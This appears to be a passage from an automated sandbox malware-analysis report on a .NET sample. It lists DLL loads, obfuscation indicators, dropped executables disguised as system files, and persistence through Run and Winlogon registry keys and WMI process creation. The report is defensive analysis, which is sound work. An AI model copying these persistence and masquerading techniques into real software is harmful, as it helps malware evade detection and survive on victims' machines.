                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: mscoree.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: version.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: profapi.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: cryptsp.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: rsaenh.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: mscoree.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: version.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: profapi.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: cryptsp.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: rsaenh.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: sspicli.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: mscoree.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: kernel.appcore.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: version.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: windows.storage.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: wldp.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: profapi.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: cryptsp.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: rsaenh.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: cryptbase.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: Wh2c6sgwRo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                Source: Wh2c6sgwRo.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.pdb source: d3yngi1q.wji.exe, 00000002.00000002.1641016699.00000000035D2000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.pdb source: d3yngi1q.wji.exe, 00000002.00000002.1641016699.00000000035D2000.00000004.00000800.00020000.00000000.sdmp

                                Data Obfuscation

                                barindex
                                .NET source code contains method to dynamically call methods (often used by packers)
                                Source: Wh2c6sgwRo.exe, FMIJCCJDKMPOHDNPCEAGFDMNEAPEGCIPGDDK.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                                .NET source code contains potential unpacker
                                Source: Wh2c6sgwRo.exe, BAJEDBNFJJBPFHOJPMCIBMAHHLJABPOFMBKC.cs.Net Code: KMODMOGLMDHHLEFABHFJEGEFGNOPNBHEMLFM
                                Source: Wh2c6sgwRo.exeStatic PE information: 0x8FECC87F [Sun Jul 8 10:48:31 2046 UTC]
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline"
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.cmdline"
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.cmdline"Jump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeCode function: 0_2_00007FFB4B29B7AC push ds; ret 0_2_00007FFB4B29B7AD
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeCode function: 2_2_00007FFB4B28E6D3 pushad ; retf 2_2_00007FFB4B28E799
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeCode function: 2_2_00007FFB4B283CB9 push ebx; retf 2_2_00007FFB4B283CBA
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeCode function: 2_2_00007FFB4B28E57D pushad ; retf 2_2_00007FFB4B28E799
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeCode function: 30_2_00007FFB4B2B3CB9 push ebx; retf 30_2_00007FFB4B2B3CBA
                                Source: C:\ProgramData\fontdrvhost.exeCode function: 37_2_00007FFB4B2A3CB9 push ebx; retf 37_2_00007FFB4B2A3CBA
                                Source: C:\ProgramData\fontdrvhost.exeCode function: 41_2_00007FFB4B2C3CB9 push ebx; retf 41_2_00007FFB4B2C3CBA
                                Source: C:\ProgramData\fontdrvhost.exeCode function: 47_2_00007FFB4B293CB9 push ebx; retf 47_2_00007FFB4B293CBA
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeCode function: 48_2_00007FFB4B2A3CB9 push ebx; retf 48_2_00007FFB4B2A3CBA
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeCode function: 50_2_00007FFB4B2B3CB9 push ebx; retf 50_2_00007FFB4B2B3CBA
                                Source: C:\ProgramData\fontdrvhost.exeCode function: 53_2_00007FFB4B2A3CB9 push ebx; retf 53_2_00007FFB4B2A3CBA
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeCode function: 54_2_00007FFB4B2B3CB9 push ebx; retf 54_2_00007FFB4B2B3CBA
                                Source: C:\ProgramData\fontdrvhost.exeCode function: 55_2_00007FFB4B283CB9 push ebx; retf 55_2_00007FFB4B283CBA
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeCode function: 56_2_00007FFB4B2B3CB9 push ebx; retf 56_2_00007FFB4B2B3CBA

                                Persistence and Installation Behavior

                                barindex
                                Creates processes via WMI
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Infects executable files (exe, dll, sys, html)
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile created: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile created: C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile created: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeFile created: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile created: C:\ProgramData\fontdrvhost.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile created: C:\ProgramData\fontdrvhost.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile created: C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file

                                Boot Survival

                                barindex
                                Creates an autostart registry key pointing to binary in C:\Windows
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSMJump to behavior
                                Creates an undocumented autostart registry key
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Creates multiple autostart registry keys
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fontdrvhostJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSMJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fontdrvhostJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fontdrvhostJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSMJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSMJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSMJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSMJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSMJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSMJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSMJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSMJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSMJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSMJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSMJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSMJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Loading BitLocker PowerShell Module
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
